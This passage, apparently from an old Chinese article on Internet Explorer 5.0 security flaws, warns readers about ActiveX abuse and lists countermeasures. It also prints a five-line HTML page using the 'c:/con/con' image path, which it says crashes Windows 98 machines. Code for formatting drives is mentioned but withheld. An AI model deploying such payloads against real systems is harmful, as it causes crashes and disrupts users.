二、IE5.0 ActiveX漏洞
IE5.0中为了增强其自身功能加入了对ActiveX控件的支持,可以创建和复制客户端文件。要是对方不怀好意,存心要黑你,这是一个极其方便的捷径!黑客可以在IE用户点击网页上的超级链接时,将html应用文件中的可执行程序放在你的硬盘里,并将你的注册表修改掉,使程序在下次重起时自动运行……
补救措施:
1.将IE的安全级别设置为高。
2.把ActiveX controls和plug-in关闭。
3.将Active scripting屏蔽掉。
三、利用IE5.0攻击系统漏洞:
以下有一段针对Windows 98系统HTML代码,虽然它只不过五行而已,但是如果你浏览一下用下面代码写成的网页,那足以让你的机器死翘翘,如果你正在上网,它将使你跌下网。
$#@60;html$#@62;
$#@60;body$#@62;
$#@60;img src=″c:/con/con″$#@62;
$#@60;/body$#@62;
? $#@60;/html$#@62;
四、利用IE5.0格式化硬盘
如果你认为上面的代码只能让你死机罢了,没什么了不起的!!那么有的代码将使你的硬盘资料如大江之水,滔滔东去不复返……(出于安全,代码略去)
以上是本人知道的一些IE浏览器漏洞,希望各位朋友能引起重视,千万不要被黑客利用,否则损失就大了。
|